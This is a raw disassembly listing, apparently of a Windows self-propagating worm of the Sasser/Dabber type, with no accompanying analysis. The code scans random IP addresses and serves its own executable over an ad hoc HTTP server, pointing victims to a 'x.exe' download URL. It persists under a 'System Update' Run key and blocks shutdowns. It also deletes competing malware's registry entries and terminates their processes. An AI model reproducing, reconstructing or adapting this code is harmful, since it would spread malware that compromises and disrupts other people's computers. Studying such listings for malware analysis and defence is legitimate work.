mov ebp, esp
sub esp, 34h
lea eax, [ebp+var_34]
push 31h
push eax
call dword_3150117C ; gethostname
cmp eax, 0FFFFFFFFh
jnz short loc_31501A14
call dword_31501180 ; WSAGetLastError
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_31501A14: ; CODE XREF: sub_315019F3+15�j
lea eax, [ebp+var_34]
push eax
call dword_31501188 ; gethostbyname
test eax, eax
jnz short loc_31501A29
mov eax, 100007Fh
leave
retn
; ---------------------------------------------------------------------------
loc_31501A29: ; CODE XREF: sub_315019F3+2D�j
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
leave
retn
sub_315019F3 endp
; =============== S U B R O U T I N E =======================================
sub_31501A32 proc near ; CODE XREF: sub_3150209F+22�p
; sub_31502103+27�p ...
var_4 = byte ptr -4
push ecx
lea eax, [esp+4+var_4]
push 0
push eax
call dword_3150115C ; InternetGetConnectedState
neg eax
sbb eax, eax
neg eax
pop ecx
retn
sub_31501A32 endp
; =============== S U B R O U T I N E =======================================
sub_31501A48 proc near ; CODE XREF: sub_31501D89+40�p
; sub_31501D89+4C�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
push 0
push 2
call dword_315010DC ; OpenEventA
test eax, eax
jz short locret_31501A61
push eax
call dword_315010D8 ; SetEvent
locret_31501A61: ; CODE XREF: sub_31501A48+10�j
retn
sub_31501A48 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31501A62 proc near ; DATA XREF: sub_31501B9B+127�o
var_200 = byte ptr -200h
var_100 = byte ptr -100h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 200h
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
xor edi, edi
lea eax, [ebp+var_100]
push edi
push 100h
push eax
push ebx
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
jnz short loc_31501A93
push 1
jmp loc_31501B4E
; ---------------------------------------------------------------------------
loc_31501A93: ; CODE XREF: sub_31501A62+28�j
mov esi, dword_31501120
lea eax, [ebp+var_100]
push offset aGet ; "GET"
push eax
call esi ; strstr
pop ecx
test eax, eax
pop ecx
jz loc_31501B51
lea eax, [ebp+var_100]
push offset a_exe ; ".exe"
push eax
call esi ; strstr
pop ecx
test eax, eax
pop ecx
jz loc_31501B51
mov esi, dword_3150119C
push 0
push 3Dh
push offset aHttp1_1200OkCo ; "HTTP/1.1 200 OK\r\nContent-Type: applicat"...
push ebx
call esi ; send
push ds:dword_31506150
lea eax, [ebp+var_200]
push offset aContentLengthU ; "Content-Length: %u\r\n\r\n"
push eax
call dword_3150113C ; wsprintfA
add esp, 0Ch
lea eax, [ebp+var_200]
push 0
push eax
call sub_31503A18 ; strlen
pop ecx
push eax
lea eax, [ebp+var_200]
push eax
push ebx
call esi ; send
loc_31501B10: ; CODE XREF: sub_31501A62+E8�j
mov eax, ds:dword_31506150
mov ecx, 1000h
sub eax, edi
cmp eax, ecx
jb short loc_31501B22
mov eax, ecx
loc_31501B22: ; CODE XREF: sub_31501A62+BC�j
test eax, eax
jz short loc_31501B6F
push 0
push eax
mov eax, ds:dword_31506148
add eax, edi
push eax
push ebx
call esi ; send
cmp eax, 0FFFFFFFFh
jz short loc_31501B4C
cmp eax, 1000h
jb short loc_31501B6F
push 64h
add edi, eax
call dword_315010A4 ; Sleep
jmp short loc_31501B10
; ---------------------------------------------------------------------------
loc_31501B4C: ; CODE XREF: sub_31501A62+D5�j
push 2
loc_31501B4E: ; CODE XREF: sub_31501A62+2C�j
pop eax
jmp short loc_31501B94
; ---------------------------------------------------------------------------
loc_31501B51: ; CODE XREF: sub_31501A62+49�j
; sub_31501A62+61�j
mov esi, dword_3150119C
push 0
push 15h
push offset aHttp1_1200Ok ; "HTTP/1.1 200 OK\r\n\r\n\r\n"
push ebx
call esi ; send
push 0
push 3
push offset dword_31505A84
push ebx
call esi ; send
loc_31501B6F: ; CODE XREF: sub_31501A62+C2�j
; sub_31501A62+DC�j
push 7D0h
call dword_315010A4 ; Sleep
push 2
push ebx
call dword_315011A4 ; shutdown
push ebx
call dword_315011A8 ; closesocket
push 0
call dword_315010E0 ; ExitThread
xor eax, eax
loc_31501B94: ; CODE XREF: sub_31501A62+ED�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_31501A62 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31501B9B proc near ; DATA XREF: sub_31501D89+133�o
var_130 = byte ptr -130h
var_28 = byte ptr -28h
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 130h
push ebx
push edi
call sub_315018BA
lea eax, [ebp+var_130]
push 104h
push eax
push offset aSystemUpdate ; "System Update"
xor ebx, ebx
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
mov ds:dword_3150614C, ebx
call sub_315023BF
add esp, 14h
test eax, eax
jnz loc_31501CD0
push esi
push ebx
push ebx
push 3
push ebx
push 1
lea eax, [ebp+var_130]
push 80000000h
push eax
call dword_315010EC ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_31501C07
push 1
call dword_315010E0 ; ExitThread
loc_31501C07: ; CODE XREF: sub_31501B9B+62�j
push ebx
push esi
call dword_315010E8 ; GetFileSize
push eax
mov ds:dword_31506150, eax
call sub_315027DB
pop ecx
mov ds:dword_31506148, eax
lea ecx, [ebp+var_4]
push ebx
push ecx
push ds:dword_31506150
push eax
push esi
call dword_315010E4 ; ReadFile
mov eax, [ebp+var_4]
push esi
mov ds:dword_31506150, eax
call dword_315010BC ; CloseHandle
push ebx
push 1
push 2
call dword_3150118C ; socket
push 10h
mov edi, eax
pop esi
lea eax, [ebp+var_18]
push esi
push ebx
push eax
call sub_31503A12 ; memset
add esp, 0Ch
mov [ebp+var_18], 2
mov [ebp+var_14], ebx
loc_31501C69: ; CODE XREF: sub_31501B9B+E5�j
; sub_31501B9B+ED�j ...
call dword_31501124 ; rand
add eax, 7D0h
and eax, 1FFFh
cmp al, bl
mov ds:dword_3150617C, eax
jz short loc_31501C69
xor ecx, ecx
mov cl, ah
test cl, cl
jz short loc_31501C69
push eax
call dword_31501194 ; ntohs
mov [ebp+var_16], ax
lea eax, [ebp+var_18]
push esi
push eax
push edi
call dword_31501170 ; bind
test eax, eax
jnz short loc_31501C69
push 64h
push edi
call dword_31501174 ; listen
mov [ebp+var_8], esi
pop esi
loc_31501CB2: ; CODE XREF: sub_31501B9B+133�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_28]
push eax
push edi
call dword_31501178 ; accept
push eax
push offset sub_31501A62
call sub_31501911
pop ecx
pop ecx
jmp short loc_31501CB2
; ---------------------------------------------------------------------------
loc_31501CD0: ; CODE XREF: sub_31501B9B+3D�j
push ebx
call dword_315010E0 ; ExitThread
pop edi
xor eax, eax
pop ebx
leave
retn 4
sub_31501B9B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31501CDF proc near ; CODE XREF: sub_31501D89:loc_31501E91�p
var_190 = byte ptr -190h
push ebp
mov ebp, esp
sub esp, 190h
lea eax, [ebp+var_190]
push esi
mov esi, dword_3150116C
push eax
push 2
call esi ; WSAStartup
lea eax, [ebp+var_190]
push eax
push 102h
call esi ; WSAStartup
pop esi
leave
retn
sub_31501CDF endp
; ---------------------------------------------------------------------------
loc_31501D0B: ; CODE XREF: UPX1:31508548�j
push 0
call dword_315010C4 ; GetModuleHandleA
push offset aFtpupd_exe ; "ftpupd.exe"
mov ds:dword_31506180, eax
call dword_31501098 ; DeleteFileA
call sub_315018BA
push offset aUterm13i ; "uterm13i"
call sub_315018E8
pop ecx
mov ds:dword_31506154, eax
call dword_3150109C ; RtlGetLastWin32Error
cmp eax, 0B7h
jnz short loc_31501D4D
push 1
call dword_315010F0 ; ExitProcess
loc_31501D4D: ; CODE XREF: UPX0:31501D43�j
call sub_31501727
call sub_31502523
call sub_3150269D
push offset sub_31501D89
call sub_315017AF
test eax, eax
pop ecx
jz short loc_31501D72
push 0
call sub_31501D89
loc_31501D72: ; CODE XREF: UPX0:31501D69�j
xor eax, eax
retn
; =============== S U B R O U T I N E =======================================
sub_31501D75 proc near ; CODE XREF: sub_31501D89:loc_31501EDF�p
; sub_3150209F:loc_315020B8�p ...
push 0
push ds:dword_31506158
call dword_31501094 ; WaitForSingleObject
neg eax
sbb eax, eax
inc eax
retn
sub_31501D75 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31501D89 proc near ; CODE XREF: UPX0:31501D6D�p
; DATA XREF: UPX0:31501D5C�o
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_315011B0
push offset loc_31503A60
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
push ebx
push esi
push edi
push offset aU13ix ; "u13ix"
xor edi, edi
push edi
push 1
push edi
call dword_31501090 ; CreateEventA
mov ds:dword_31506158, eax
mov [ebp+var_4], edi
push offset aU10x ; "u10x"
call sub_31501A48
mov [esp+8+var_8], offset aU11x ; "u11x"
call sub_31501A48
mov [esp+8+var_8], offset aU12x ; "u12x"
call sub_31501A48
mov [esp+8+var_8], offset aU13x ; "u13x"
call sub_31501A48
mov [esp+8+var_8], offset aU8 ; "u8"
call sub_315018E8
mov [esp+8+var_8], offset aU9 ; "u9"
call sub_315018E8
mov [esp+8+var_8], offset aU10 ; "u10"
call sub_315018E8
mov [esp+8+var_8], offset aU11 ; "u11"
call sub_315018E8
mov [esp+8+var_8], offset aU12 ; "u12"
call sub_315018E8
mov [esp+8+var_8], offset aU13 ; "u13"
call sub_315018E8
mov [esp+8+var_8], offset aU13i ; "u13i"
call sub_315018E8
mov [esp+8+var_8], offset aU14 ; "u14"
call sub_315018E8
pop ecx
cmp [ebp+arg_0], edi
jz short loc_31501E91
push offset aWs2_32 ; "ws2_32"
mov esi, dword_315010B4
call esi ; LoadLibraryA
push offset aWininet ; "wininet"
call esi ; LoadLibraryA
push offset aMsvcrt ; "msvcrt"
call esi ; LoadLibraryA
push offset aAdvapi32 ; "advapi32"
call esi ; LoadLibraryA
push offset aUser32 ; "user32"
call esi ; LoadLibraryA
push offset aUterm13i ; "uterm13i"
call sub_315018E8
pop ecx
mov ds:dword_31506154, eax
loc_31501E91: ; CODE XREF: sub_31501D89+CD�j
call sub_31501CDF
push edi
push offset sub_31501F46
call sub_31501911
pop ecx
pop ecx
push 1F4h
mov esi, dword_315010A4
call esi ; Sleep
push edi
push offset loc_315033E3
call sub_315018F7
push edi
push offset sub_31501B9B
call sub_315018F7
push edi
push offset sub_31502BC3
call sub_315018F7
push edi
push offset loc_315022AE
call sub_315018F7
add esp, 20h
loc_31501EDF: ; CODE XREF: sub_31501D89+16D�j
call sub_31501D75
test eax, eax
jnz short loc_31501EF8
push edi
call dword_31501038 ; AbortSystemShutdownA
push 1388h
call esi ; Sleep
jmp short loc_31501EDF
; ---------------------------------------------------------------------------
loc_31501EF8: ; CODE XREF: sub_31501D89+15D�j
or [ebp+var_4], 0FFFFFFFFh
call nullsub_1
xor eax, eax
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 4
sub_31501D89 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_31501F15 proc near ; CODE XREF: sub_31501F46+F9�p
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
xor esi, esi
push edi
call sub_31503A18 ; strlen
test eax, eax
pop ecx
jbe short loc_31501F43
loc_31501F28: ; CODE XREF: sub_31501F15+2C�j
mov al, [esi+edi]
cmp al, 0Ah
jz short loc_31501F33
cmp al, 0Dh
jnz short loc_31501F37
loc_31501F33: ; CODE XREF: sub_31501F15+18�j
and byte ptr [esi+edi], 0
loc_31501F37: ; CODE XREF: sub_31501F15+1C�j
push edi
inc esi
call sub_31503A18 ; strlen
cmp esi, eax
pop ecx
jb short loc_31501F28
loc_31501F43: ; CODE XREF: sub_31501F15+11�j
pop edi
pop esi
retn
sub_31501F15 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31501F46 proc near ; DATA XREF: sub_31501D89+10E�o
var_154 = dword ptr -154h
var_148 = byte ptr -148h
var_48 = byte ptr -48h
var_28 = byte ptr -28h
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 148h
push ebx
mov [ebp+var_8], esp
call sub_315018BA
call dword_31501124 ; rand
push 4
cdq
pop ecx
idiv ecx
lea eax, [ebp+var_48]
add edx, 3
push edx
push eax
call sub_31501932
lea eax, [ebp+var_48]
mov ebx, offset dword_3150615C
push eax
push ebx
call sub_31503A6C ; strcpy
add esp, 10h
mov [ebp+var_4], 10h
push 0
push 1
push 2
call dword_3150118C ; socket
push 0
mov [ebp+var_8], eax
mov [ebp+var_18], 2
call dword_31501168 ; ntohl
push 71h
mov [ebp+var_14], eax
call dword_31501194 ; ntohs
push [ebp+var_4]
mov [ebp+var_16], ax
lea eax, [ebp+var_18]
push eax
push [ebp+var_8]
call dword_31501170 ; bind
test eax, eax
jz short loc_31501FD2
push 1
pop eax
loc_31501FCD: ; CODE XREF: sub_31501F46+A2�j
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_31501FD2: ; CODE XREF: sub_31501F46+82�j
push esi
push edi
push 5
push [ebp+var_8]
call dword_31501174 ; listen
test eax, eax
jz short loc_31501FEA
push 1
pop eax
pop edi
pop esi
jmp short loc_31501FCD
; ---------------------------------------------------------------------------
loc_31501FEA: ; CODE XREF: sub_31501F46+9B�j
mov edi, dword_315010A4
loc_31501FF0: ; CODE XREF: sub_31501F46+C6�j
; sub_31501F46+E8�j
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_28]
push eax
push [ebp+var_8]
call dword_31501178 ; accept
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_3150200E
push 64h
call edi ; Sleep
jmp short loc_31501FF0
; ---------------------------------------------------------------------------
loc_3150200E: ; CODE XREF: sub_31501F46+C0�j
push 0
lea eax, [ebp+var_148]
push 100h
push eax
push esi
call dword_315011A0 ; recv
test eax, eax
jnz short loc_31502030
loc_31502027: ; CODE XREF: sub_31501F46+157�j
push esi
call dword_315011A8 ; closesocket
jmp short loc_31501FF0
; ---------------------------------------------------------------------------
loc_31502030: ; CODE XREF: sub_31501F46+DF�j
and [ebp+eax+var_148], 0
lea eax, [ebp+var_148]
push eax
call sub_31501F15
lea eax, [ebp+var_148]
mov [esp+154h+var_154], offset aUseridUnix ; " : USERID : UNIX : "
push eax
call sub_31503A66 ; strcat
lea eax, [ebp+var_148]
push ebx
push eax
call sub_31503A66 ; strcat
lea eax, [ebp+var_148]
push offset asc_31505B7C ; "\r\n"
push eax
call sub_31503A66 ; strcat
add esp, 18h
lea eax, [ebp+var_148]
push 0
push eax
call sub_31503A18 ; strlen
pop ecx
push eax
lea eax, [ebp+var_148]
push eax
push esi
call dword_3150119C ; send
push 1388h
call edi ; Sleep
jmp short loc_31502027
sub_31501F46 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3150209F proc near ; DATA XREF: sub_31502103+55�o
; sub_3150218B+6A�o ...
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp byte ptr [ebp+arg_0], 7Fh
jnz short loc_315020AE
push 1
pop eax
jmp short locret_315020FF
; ---------------------------------------------------------------------------
loc_315020AE: ; CODE XREF: sub_3150209F+8�j
mov al, byte ptr [ebp+arg_0+3]
push ebx
push esi
mov [ebp+var_1], al
xor bl, bl
loc_315020B8: ; CODE XREF: sub_3150209F+5A�j
call sub_31501D75
test eax, eax
jnz short loc_315020FB
call sub_31501A32
test eax, eax
jz short loc_315020FB
cmp [ebp+var_1], bl
jz short loc_315020F4
mov byte ptr [ebp+arg_0+3], bl
push [ebp+arg_0]
call sub_315011C0
movzx esi, ds:word_3150618C
pop ecx
call dword_31501124 ; rand
cdq
idiv esi
add edx, esi
push edx
call dword_315010A4 ; Sleep
loc_315020F4: ; CODE XREF: sub_3150209F+2E�j
inc bl
cmp bl, 0FFh
jb short loc_315020B8
loc_315020FB: ; CODE XREF: sub_3150209F+20�j
; sub_3150209F+29�j
pop esi
xor eax, eax
pop ebx
locret_315020FF: ; CODE XREF: sub_3150209F+D�j
leave
retn 4
sub_3150209F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31502103 proc near ; DATA XREF: sub_3150218B+7E�o
; UPX0:31502340�o
arg_0 = dword ptr 8
push ebp
mov ebp, esp
cmp byte ptr [ebp+arg_0], 7Fh
jnz short loc_31502111
push 1
pop eax
jmp short loc_31502187
; ---------------------------------------------------------------------------
loc_31502111: ; CODE XREF: sub_31502103+7�j
push ebx
push esi
push edi
call sub_315018BA
mov esi, dword_31501124
xor ebx, ebx
loc_31502121: ; CODE XREF: sub_31502103+7D�j
call sub_31501D75
test eax, eax
jnz short loc_31502182
call sub_31501A32
test eax, eax
jz short loc_31502182
call esi ; rand
mov byte ptr [ebp+arg_0+2], al
call esi ; rand
push offset dword_31506184
mov byte ptr [ebp+arg_0+3], al
call dword_3150108C ; InterlockedIncrement
push [ebp+arg_0]
call sub_315011C0
test eax, eax
pop ecx
jnz short loc_31502164
push [ebp+arg_0]
push offset sub_3150209F
call sub_31501911
pop ecx
pop ecx
loc_31502164: ; CODE XREF: sub_31502103+50�j
movzx edi, ds:word_3150618C
call esi ; rand
cdq
idiv edi
add edx, edi
push edx
call dword_315010A4 ; Sleep
inc ebx
cmp ebx, 8000h
jl short loc_31502121
loc_31502182: ; CODE XREF: sub_31502103+25�j
; sub_31502103+2E�j
pop edi
pop esi
xor eax, eax
pop ebx
loc_31502187: ; CODE XREF: sub_31502103+C�j
pop ebp
retn 4
sub_31502103 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3150218B proc near ; DATA XREF: UPX0:31502358�o
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
call sub_315018BA
call sub_31501D75
test eax, eax
jnz loc_31502244
push ebx
mov ebx, dword_315010A4
push esi
mov esi, dword_31501124
push edi
loc_315021B1: ; CODE XREF: sub_3150218B+48�j
; sub_3150218B+B0�j
call esi ; rand
mov byte ptr [ebp+var_4+1], al
call esi ; rand
mov byte ptr [ebp+var_4+3], al
call esi ; rand
mov byte ptr [ebp+var_4+2], al
loc_315021C0: ; CODE XREF: sub_3150218B+3C�j
call esi ; rand
cmp al, 7Fh
mov byte ptr [ebp+var_4], al
jz short loc_315021C0
call sub_315019F3
mov edi, [ebp+var_4]
cmp edi, eax
jz short loc_315021B1
call sub_31501A32
test eax, eax
jz short loc_3150221C
push offset dword_31506184
call dword_3150108C ; InterlockedIncrement
push edi
call sub_315011C0
test eax, eax
pop ecx
jnz short loc_31502223
push edi
push offset sub_3150209F
call sub_31501911
pop ecx
mov [ebp+var_8], 4
pop ecx
loc_31502208: ; CODE XREF: sub_3150218B+8D�j
push edi
push offset sub_31502103
call sub_31501911
dec [ebp+var_8]
pop ecx
pop ecx
jnz short loc_31502208
jmp short loc_31502223
; ---------------------------------------------------------------------------
loc_3150221C: ; CODE XREF: sub_3150218B+51�j
push 2710h
call ebx ; Sleep
loc_31502223: ; CODE XREF: sub_3150218B+67�j
; sub_3150218B+8F�j
movzx edi, ds:word_3150618C
call esi ; rand
cdq
idiv edi
add edx, edi
push edx
call ebx ; Sleep
call sub_31501D75
test eax, eax
jz loc_315021B1
pop edi
pop esi
pop ebx
loc_31502244: ; CODE XREF: sub_3150218B+11�j
push 0
call dword_315010E0 ; ExitThread
xor eax, eax
leave
retn 4
sub_3150218B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31502252 proc near ; CODE XREF: UPX0:loc_31502319�p
; UPX0:loc_31502383�p
var_50 = byte ptr -50h
var_28 = byte ptr -28h
push ebp
mov ebp, esp
sub esp, 50h
push esi
call sub_315019F3
push eax
call dword_31501190 ; inet_ntoa
mov esi, dword_31501088
push eax
lea eax, [ebp+var_28]
push eax
call esi ; lstrcpyA
push ds:dword_3150617C
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_50]
push offset aHttpSDX_exe ; "http://%s:%d/x.exe"
push eax
call dword_3150113C ; wsprintfA
add esp, 10h
lea eax, [ebp+var_50]
push eax
push offset word_31505002
call esi ; lstrcpyA
push offset byte_31505000
call dword_315010A0 ; lstrlenA
mov byte_31505000[eax], 0DFh
pop esi
leave
retn
sub_31502252 endp
; ---------------------------------------------------------------------------
loc_315022AE: ; DATA XREF: sub_31501D89+149�o
push ecx
push ecx
push ebx
push ebp
push esi
xor ebp, ebp
push edi
mov ds:dword_31506184, ebp
call sub_31501A32
mov esi, dword_315010A4
mov edi, 1388h
test eax, eax
jnz short loc_315022DC
loc_315022D0: ; CODE XREF: UPX0:315022DA�j
push edi
call esi ; Sleep
call sub_31501A32
test eax, eax
jz short loc_315022D0
loc_315022DC: ; CODE XREF: UPX0:315022CE�j
lea eax, [esp+14h]
push ebp
push eax
call dword_3150115C ; InternetGetConnectedState
test byte ptr [esp+14h], 2
push 50h
mov ds:dword_31506188, ebp
pop ebx
mov ds:word_3150618C, 96h
jz short loc_31502319
mov ds:dword_31506188, 1
mov ebx, 15Eh
mov ds:word_3150618C, 14h
loc_31502319: ; CODE XREF: UPX0:315022FF�j
call sub_31502252
mov ebp, [esp+14h]
cmp ebp, 100007Fh
jz short loc_31502337
push ebp
push offset sub_3150209F
call sub_31501911
pop ecx
pop ecx
loc_31502337: ; CODE XREF: UPX0:31502328�j
mov dword ptr [esp+10h], 4
loc_3150233F: ; CODE XREF: UPX0:31502350�j
push ebp
push offset sub_31502103
call sub_31501911
dec dword ptr [esp+18h]
pop ecx
pop ecx
jnz short loc_3150233F
test ebx, ebx
jle short loc_31502367
loc_31502356: ; CODE XREF: UPX0:31502365�j
push 0
push offset sub_3150218B
call sub_31501911
pop ecx
dec ebx
pop ecx
jnz short loc_31502356
loc_31502367: ; CODE XREF: UPX0:31502354�j
; UPX0:31502373�j ...
call sub_31501A32
test eax, eax
jz short loc_31502375
push edi
call esi ; Sleep
jmp short loc_31502367
; ---------------------------------------------------------------------------
loc_31502375: ; CODE XREF: UPX0:3150236E�j
; UPX0:31502381�j
call sub_31501A32
test eax, eax
jnz short loc_31502383
push edi
call esi ; Sleep
jmp short loc_31502375
; ---------------------------------------------------------------------------
loc_31502383: ; CODE XREF: UPX0:3150237C�j
call sub_31502252
jmp short loc_31502367
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3150238A proc near ; CODE XREF: sub_31502523+8C�p
; sub_3150269D+11A�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
push 0F003Fh
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call dword_3150102C ; RegOpenKeyExA
test eax, eax
jnz short loc_315023BD
push [ebp+arg_8]
push [ebp+arg_4]
call dword_31501030 ; RegDeleteValueA
push [ebp+arg_4]
call dword_31501034 ; RegCloseKey
loc_315023BD: ; CODE XREF: sub_3150238A+1C�j
pop ebp
retn
sub_3150238A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315023BF proc near ; CODE XREF: sub_31501B9B+33�p
; sub_31502523+7D�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_10]
push esi
mov [ebp+var_4], eax
lea eax, [ebp+arg_10]
push eax
xor esi, esi
push 0F003Fh
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call dword_3150102C ; RegOpenKeyExA
test eax, eax
jz short loc_315023EB
push 1
pop eax
jmp short loc_31502415
; ---------------------------------------------------------------------------
loc_315023EB: ; CODE XREF: sub_315023BF+25�j
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+arg_4]
push [ebp+arg_C]
push eax
push esi
push [ebp+arg_8]
push [ebp+arg_10]
call dword_31501028 ; RegQueryValueExA
test eax, eax
jz short loc_3150240A
push 2
pop esi
loc_3150240A: ; CODE XREF: sub_315023BF+46�j
push [ebp+arg_10]
call dword_31501034 ; RegCloseKey
mov eax, esi
loc_31502415: ; CODE XREF: sub_315023BF+2A�j
pop esi
leave
retn
sub_315023BF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31502418 proc near ; CODE XREF: sub_315025D1+96�p
; sub_3150269D+7C�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push esi
xor esi, esi
lea eax, [ebp+arg_4]
push esi
push eax
push esi
push 0F003Fh
push esi
push esi
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call dword_31501020 ; RegCreateKeyExA
test eax, eax
jz short loc_31502441
push 1
pop eax
jmp short loc_31502468
; ---------------------------------------------------------------------------
loc_31502441: ; CODE XREF: sub_31502418+22�j
push [ebp+arg_10]
push [ebp+arg_C]
push 1
push esi
push [ebp+arg_8]
push [ebp+arg_4]
call dword_31501024 ; RegSetValueExA
test eax, eax
jz short loc_3150245D
push 2
pop esi
loc_3150245D: ; CODE XREF: sub_31502418+40�j
push [ebp+arg_4]
call dword_31501034 ; RegCloseKey
mov eax, esi
loc_31502468: ; CODE XREF: sub_31502418+27�j
pop esi
pop ebp
retn
sub_31502418 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3150246B proc near ; CODE XREF: sub_31502523+98�p
var_128 = dword ptr -128h
var_120 = dword ptr -120h
var_104 = byte ptr -104h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 128h
push ebx
mov ebx, [ebp+arg_0]
push esi
push ebx
call dword_315010A0 ; lstrlenA
mov esi, eax
dec esi
test esi, esi
jle loc_3150251F
loc_3150248B: ; CODE XREF: sub_3150246B+27�j
cmp byte ptr [esi+ebx], 5Ch
jz short loc_31502494
dec esi
jns short loc_3150248B
loc_31502494: ; CODE XREF: sub_3150246B+24�j
push 0
push 2
call sub_31503A9C ; CreateToolhelp32Snapshot
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz short loc_3150251F
push 128h
lea eax, [ebp+var_128]
push 0
push eax
call sub_31503A12 ; memset
add esp, 0Ch
lea eax, [ebp+var_128]
mov [ebp+var_128], 128h
push eax
push [ebp+arg_0]
call sub_31503A96 ; Process32First
test eax, eax
jz short loc_3150251F
lea esi, [esi+ebx+1]
loc_315024DC: ; CODE XREF: sub_3150246B+B2�j
lea eax, [ebp+var_104]
push eax
push esi
call dword_31501120 ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_3150250C
push [ebp+var_120]
push 0
push 1F0FFFh
call dword_315010C0 ; OpenProcess
push 0
push eax
call dword_31501080 ; TerminateProcess
loc_3150250C: ; CODE XREF: sub_3150246B+83�j
lea eax, [ebp+var_128]
push eax
push [ebp+arg_0]
call sub_31503A90 ; Process32Next
test eax, eax
jnz short loc_315024DC
loc_3150251F: ; CODE XREF: sub_3150246B+1A�j
; sub_3150246B+38�j ...
pop esi
pop ebx
leave
retn
sub_3150246B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31502523 proc near ; CODE XREF: UPX0:31501D52�p
var_138 = byte ptr -138h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 138h
push ebx
push esi
lea eax, [ebp+var_30]
push edi
mov [ebp+var_30], offset aWindowsSecurit ; "Windows Security Manager"
mov [ebp+var_2C], offset aDiskDefragment ; "Disk Defragmenter"
mov [ebp+var_28], offset aSystemRestoreS ; "System Restore Service"
mov [ebp+var_24], offset aBotLoader ; "Bot Loader"
mov [ebp+var_20], offset aSystray ; "SysTray"
mov [ebp+var_1C], offset aWinupdate ; "WinUpdate"
mov [ebp+var_18], offset aWindowsUpdateS ; "Windows Update Service"
mov [ebp+var_14], offset aAvserve_exe ; "avserve.exe"
mov [ebp+var_10], offset aAvserve2_exeup ; "avserve2.exeUpdate Service"
mov [ebp+var_C], offset aMsConfigV13 ; "MS Config v13"
mov [ebp+var_4], eax
mov [ebp+var_8], 0Ah
mov edi, offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
mov esi, 80000002h
loc_3150258C: ; CODE XREF: sub_31502523+A7�j
mov eax, [ebp+var_4]
push 104h
mov ebx, [eax]
lea eax, [ebp+var_138]
push eax
push ebx
push edi
push esi
call sub_315023BF
add esp, 14h
test eax, eax
jnz short loc_315025C3
push ebx
push edi
push esi
call sub_3150238A
lea eax, [ebp+var_138]
push eax
call sub_3150246B
add esp, 10h
loc_315025C3: ; CODE XREF: sub_31502523+87�j
add [ebp+var_4], 4
dec [ebp+var_8]
jnz short loc_3150258C
pop edi
pop esi
pop ebx
leave
retn
